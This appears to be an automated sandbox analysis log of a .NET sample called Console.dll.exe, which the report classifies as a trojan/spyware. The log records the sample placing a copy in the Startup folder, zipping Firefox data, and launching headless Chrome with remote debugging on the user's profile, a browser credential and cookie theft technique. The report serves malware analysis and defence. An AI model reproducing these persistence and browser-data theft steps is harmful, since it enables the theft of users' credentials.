            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_00764B007_2_00764B00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_0079FB007_2_0079FB00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_0074DBF07_2_0074DBF0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_00653CA07_2_00653CA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_0079DC807_2_0079DC80
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_00697DE07_2_00697DE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_00796DA07_2_00796DA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_00636E607_2_00636E60
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_00552E107_2_00552E10
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_007A9ED07_2_007A9ED0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_004D7F107_2_004D7F10
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: 7_2_007A8F807_2_007A8F80
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: String function: 010DC750 appears 55 times
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeCode function: String function: 005AC750 appears 55 times
            Source: Console.dll.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
            Source: System.Runtime.Serialization.Formatters.dll.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: System.Runtime.Serialization.Primitives.dll.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
            Source: System.Collections.Immutable.dll.0.drStatic PE information: No import functions for PE file found
            Source: System.Security.AccessControl.dll.0.drStatic PE information: No import functions for PE file found
            Source: System.Runtime.Serialization.Formatters.dll.0.drStatic PE information: No import functions for PE file found
            Source: System.Runtime.Numerics.dll.0.drStatic PE information: No import functions for PE file found
            Source: System.Collections.NonGeneric.dll.0.drStatic PE information: No import functions for PE file found
            Source: System.Collections.Specialized.dll.0.drStatic PE information: No import functions for PE file found
            Source: System.ComponentModel.Annotations.dll.0.drStatic PE information: No import functions for PE file found
            Source: System.Runtime.Serialization.Primitives.dll.0.drStatic PE information: No import functions for PE file found
            Source: System.Collections.dll.0.drStatic PE information: No import functions for PE file found
            Source: Console.dll.exeBinary or memory string: OriginalFilename vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1638168932.000000006C5F1000.00000020.00000001.01000000.00000019.sdmpBinary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1630125324.00000000095E8000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenameConsole.dll0 vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1636729872.000000006C121000.00000020.00000001.01000000.0000001F.sdmpBinary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1646723335.000000006EDC1000.00000020.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenameSystem.Collections.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemscordaccore.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameConsole.dll0 vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1637593746.000000006C3C1000.00000020.00000001.01000000.0000001C.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1642766032.000000006C7B1000.00000020.00000001.01000000.00000016.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.TypeConverter.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1637368527.000000006C321000.00000020.00000001.01000000.0000001D.sdmpBinary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1635734665.000000006BF61000.00000020.00000001.01000000.0000002A.sdmpBinary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1630061782.00000000095C2000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilenamenetstandard.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1631820194.0000000009C44000.00000002.00000001.01000000.0000001A.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Tracing.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1638351948.000000006C631000.00000020.00000001.01000000.00000018.sdmpBinary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1646500548.000000006EC51000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1629648212.0000000009534000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenameSystem.Text.Encoding.Extensions.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1647079139.0000000074351000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmpBinary or memory string: OriginalFilenameSystem.Linq.Expressions.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1646599876.000000006ED91000.00000020.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilenameSystem.Console.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1636900853.000000006C161000.00000020.00000001.01000000.0000001E.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1645448627.000000006CC41000.00000020.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSQLite.Interop.dllF vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1631582115.0000000009C04000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1635971545.000000006C001000.00000020.00000001.01000000.00000027.sdmpBinary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1629404579.0000000009424000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1630204693.0000000009612000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1634320810.000000000C514000.00000002.00000001.01000000.00000029.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Intrinsics.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1630023273.00000000095BA000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamewebsocket-sharp.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1646860500.000000006FAC1000.00000020.00000001.01000000.0000002C.sdmpBinary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1634258310.000000000C504000.00000002.00000001.01000000.00000028.sdmpBinary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1631382518.0000000009BCE000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1636211837.000000006C021000.00000020.00000001.01000000.00000025.sdmpBinary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1645294849.000000006CBF1000.00000020.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1636561283.000000006C0A1000.00000020.00000001.01000000.00000022.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1645066855.000000006CBA1000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenameSystem.Threading.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1645167317.000000006CBC1000.00000020.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1635631356.000000006BF51000.00000020.00000001.01000000.0000002B.sdmpBinary or memory string: OriginalFilenameSystem.IO.Compression.ZipFile.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1646976071.0000000073C61000.00000020.00000001.01000000.00000017.sdmpBinary or memory string: OriginalFilenameSystem.ObjectModel.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000000.00000002.1634168948.000000000C4E4000.00000002.00000001.01000000.00000026.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilename vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2013616333.0000000073C61000.00000020.00000001.01000000.00000017.sdmpBinary or memory string: OriginalFilenameSystem.ObjectModel.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2003940362.0000000009474000.00000002.00000001.01000000.0000001A.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Tracing.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2013767303.0000000074351000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2012314955.000000006F8D1000.00000020.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenameSystem.Threading.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.TypeConverter.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2012771691.000000006FA21000.00000020.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2002330319.0000000009174000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2009638328.000000006C6D1000.00000020.00000001.01000000.00000018.sdmpBinary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2013010421.000000006FA71000.00000020.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilenameSystem.Console.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2006604253.000000000BD14000.00000002.00000001.01000000.00000026.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Overlapped.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2002875907.0000000009212000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilenamenetstandard.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2012640726.000000006FA01000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2008613151.000000006C1C1000.00000020.00000001.01000000.00000022.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2001237728.0000000008C42000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2002237108.0000000008E08000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenameConsole.dll0 vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2006839086.000000000BD44000.00000002.00000001.01000000.00000028.sdmpBinary or memory string: OriginalFilenameSystem.Threading.ThreadPool.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2006989969.000000000BF14000.00000002.00000001.01000000.00000029.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Intrinsics.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000000.1732782276.0000000000B21000.00000002.00000001.01000000.0000002D.sdmpBinary or memory string: OriginalFilenamemscordaccore.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000000.1732782276.0000000000B21000.00000002.00000001.01000000.0000002D.sdmpBinary or memory string: OriginalFilenameConsole.dll0 vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2008903871.000000006C241000.00000020.00000001.01000000.0000001E.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2010963718.000000006CC41000.00000020.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2011990883.000000006ED91000.00000020.00000001.01000000.0000002B.sdmpBinary or memory string: OriginalFilenameSystem.IO.Compression.ZipFile.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2008280739.000000006C121000.00000020.00000001.01000000.00000027.sdmpBinary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2012440781.000000006F9D1000.00000020.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameSystem.Memory.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2008763140.000000006C201000.00000020.00000001.01000000.0000001F.sdmpBinary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2008453543.000000006C141000.00000020.00000001.01000000.00000025.sdmpBinary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2009427893.000000006C4A1000.00000020.00000001.01000000.0000001C.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmpBinary or memory string: OriginalFilenameSystem.Linq.Expressions.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2002817527.000000000920A000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilenamewebsocket-sharp.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2009258899.000000006C401000.00000020.00000001.01000000.0000001D.sdmpBinary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2013487031.0000000070161000.00000020.00000001.01000000.0000002C.sdmpBinary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2008096157.000000006C051000.00000020.00000001.01000000.0000002A.sdmpBinary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2002523113.0000000009194000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenameSystem.Text.Encoding.Extensions.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2003847073.000000000945E000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2013312223.000000006FAA1000.00000020.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilenameSystem.Collections.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2012133277.000000006EDC1000.00000020.00000001.01000000.00000019.sdmpBinary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs Console.dll.exe
            Source: Console.dll.exe, 00000007.00000002.2003175847.0000000009254000.00000002.00000001.01000000.00000014.sdmpBinary or memory string: OriginalFilenameSystem.Threading.Thread.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenamemscordaccore.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameConsole.dll0 vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameMicrosoft.CSharp.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.Core.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameSystem.AppContext.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameSystem.Buffers.dll@ vs Console.dll.exe
            Source: Console.dll.exeBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs Console.dll.exe
            Source: Console.dll.exe.0.drBinary or memory string: OriginalFilenamemscordaccore.dll@ vs Console.dll.exe
            Source: Console.dll.exe.0.drBinary or memory string: OriginalFilenameConsole.dll0 vs Console.dll.exe
            Source: Console.dll.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: classification engineClassification label: mal76.troj.adwa.spyw.evad.winEXE@14/195@0/2
            Source: C:\Users\user\Desktop\Console.dll.exeCode function: 0_2_0121C0D0 FormatMessageW,GetLastError,WideCharToMultiByte,GetLastError,WideCharToMultiByte,WideCharToMultiByte,MultiByteToWideChar,MultiByteToWideChar,wcscpy_s,HeapFree,HeapFree,0_2_0121C0D0
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user\Documents\887849 - FIREFOX.zipJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Console.dll.exeFile created: C:\Users\user~1\AppData\Local\Temp\.netJump to behavior
            Source: Console.dll.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Users\user\Desktop\Console.dll.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: Console.dll.exe, 00000000.00000003.1608935848.000000000CE5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE y(name PRIMARY KEY,mode,mtime,sz,rawdata,data,method,z HIDDEN) WITHOUT ROWID;
            Source: Console.dll.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
            Source: Console.dll.exeString found in binary or memory: Morph - Structs/AddrExp
            Source: Console.dll.exeString found in binary or memory: NYI: patchpoint info generationD:\a\_work\1\s\src\coreclr\jit\compiler.cpptail.call and not BBINSTRprejitPre-importloopIndirect call transformImportationPost-importExpand patchpointsProfile instrumentationProfile instrumentation prepMorph - InitProfile incorporationMorph - Add internal blocksMorph - InliningRemove empty tryAllocate ObjectsMerge callfinally chainsRemove empty finallyUpdate finally target flagsClone finallyMorph - Structs/AddrExpUpdate flow graph early passPhysical promotionEarly livenessIdentify candidates for implicit byref copy omissionForward SubstitutionMorph - Promote StructsMorph - ByRefsMorph - FinishMorph - GlobalCompute edge weights (1, false)GS CookieMerge throw blocksTail mergePost-morph tail mergeInvert loopsOptimize layoutOptimize control flowSet block weightsCompute blocks reachabilityFind loopsRedundant zero InitsUnroll loopsClone loopsMorph array opsClear loop infoMark local varsHoist loop codeFind oper orderOptimize boolsBuild SSA representationSet block orderSSA: Doms1SSA: topological sortSSA: DFSSA: livenessSSA: renameSSA: insert phisDo value numberingEarly Value PropagationOptimize Valnum CSEsOptimize index checksVN based intrinsic expansionVN based copy propAssertion propRedundant branch optsVN-based dead store removalIf conversionCompute edge weights (2, false)Update flow graph opt passExpand runtime lookupsStress gtSplitTreeExpand TLS accessExpand static initDetermine first cold blockInsert GC PollsDo 'simple' loweringRationalize IRLocal var liveness initLocal var livenessGlobal local var livenessPer block local var livenessLowering nodeinfoLowering decompositionLinear scan register allocCalculate stack level slotsLSRA allocateLSRA build intervalsPlace 'align' instructionsLSRA resolveEmit codeGenerate codePost-EmitEmit GC+EH tablesProcessor does not have a high-frequency timer.
            Source: Console.dll.exeString found in binary or memory: GC initialization failed with error 0x%08XVirtualAlloc2kernelbase.dllMapViewOfFile3bad array new lengthstring too longUsing internal fxrApplication root path is empty. This shouldn't happenUsing internal hostpolicy<path>--additionalprobingpath--depsfilePath containing probing policy and assemblies to probe for.--runtimeconfigPath to <application>.deps.json file.--fx-versionPath to <application>.runtimeconfig.json file.Version of the installed Shared Framework to use to run the application.<version><value>--roll-forward--additional-depsRoll forward to framework version (LatestPatch, Minor, LatestMinor, Major, LatestMajor, Disable)--roll-forward-on-no-candidate-fxPath to additional deps.json file.<obsolete><n>Parsed known arg %s = %ssdk %s %-*s %sFailed to parse supported options or their values:Application '%s' is not a managed executable.Using the provided arguments to determine the application to execute.dotnet exec needs a managed .dll or .exe extension. The application specified was '%s'Application '%s' does not exist.--- Executing in split/FX mode...The application to execute does not exist: '%s'--- Executing in muxer mode...--- Executing in a native executable mode...staticexec RID: %s
            Source: Console.dll.exeString found in binary or memory: https://aka.ms/dotnet/download The path to an application .dll file to execute.path-to-application: --list-runtimes Display the installed runtimeshost-options:Common Options: --list-sdks Display the installed SDKs --info Display .NET information. -h|--help Displays this help.invalid string positionvector too longinvalid hash bucket countunordered_map/set too long--- Invoked %s [version: %s]Invalid startup info: host_path, dotnet_root, and app_path should not be null.hostfxr_main_startupinfohostfxr_main_bundle_startupinfoA fatal error occurred while processing application bundleget-native-search-directoriesHosting components are already initialized. Re-initialization to execute an app is not allowed.Runtime config is cfg=%s dev=%s|arch|\|tfm|.json.dev.jsonIgnoring additional probing path %s as it does not exist.The specified runtimeconfig.json [%s] does not exist|arch|/|tfm|Ignoring host interpreted additional probing path %s as it does not exist.Invalid runtimeconfig.json [%s] [%s].deps.jsonApp runtimeconfig.json from [%s]Specified runtimeconfig.json from [%s]The specified deps.json [%s] does not existInvalid value for command line argument '%s'Detecting mode... CoreCLR present in dotnet root [%s] and checking if [%s] file present=[%d].runtimeconfig.jsonHOSTFXR_PATHframework-dependentIt's invalid to use both '%s' and '%s' command line options.DOTNET_ADDITIONAL_DEPSself-containedExecuting as a %s app as per config file [%s]Using dotnet root path [%s]-h--help--list-sdks--list-runtimes--infoThe command could not be loaded, possibly because:
            Source: Console.dll.exeString found in binary or memory: https://aka.ms/dotnet/download The path to an application .dll file to execute.path-to-application: --list-runtimes Display the installed runtimeshost-options:Common Options: --list-sdks Display the installed SDKs --info Display .NET information. -h|--help Displays this help.invalid string positionvector too longinvalid hash bucket countunordered_map/set too long--- Invoked %s [version: %s]Invalid startup info: host_path, dotnet_root, and app_path should not be null.hostfxr_main_startupinfohostfxr_main_bundle_startupinfoA fatal error occurred while processing application bundleget-native-search-directoriesHosting components are already initialized. Re-initialization to execute an app is not allowed.Runtime config is cfg=%s dev=%s|arch|\|tfm|.json.dev.jsonIgnoring additional probing path %s as it does not exist.The specified runtimeconfig.json [%s] does not exist|arch|/|tfm|Ignoring host interpreted additional probing path %s as it does not exist.Invalid runtimeconfig.json [%s] [%s].deps.jsonApp runtimeconfig.json from [%s]Specified runtimeconfig.json from [%s]The specified deps.json [%s] does not existInvalid value for command line argument '%s'Detecting mode... CoreCLR present in dotnet root [%s] and checking if [%s] file present=[%d].runtimeconfig.jsonHOSTFXR_PATHframework-dependentIt's invalid to use both '%s' and '%s' command line options.DOTNET_ADDITIONAL_DEPSself-containedExecuting as a %s app as per config file [%s]Using dotnet root path [%s]-h--help--list-sdks--list-runtimes--infoThe command could not be loaded, possibly because:
            Source: Console.dll.exeString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
            Source: Console.dll.exeString found in binary or memory: https://aka.ms/dotnet/app-launch-failedFramework: 'The framework 'You must install .NET Desktop Runtime to run this application.You must install or update .NET to run this application.Required:
            Source: C:\Users\user\Desktop\Console.dll.exeFile read: C:\Users\user\Desktop\Console.dll.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Console.dll.exe "C:\Users\user\Desktop\Console.dll.exe"
            Source: C:\Users\user\Desktop\Console.dll.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1728 --field-trial-handle=1436,i,4566748188218501428,17155313862400760302,262144 --disable-features=PaintHolding /prefetch:8
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data"
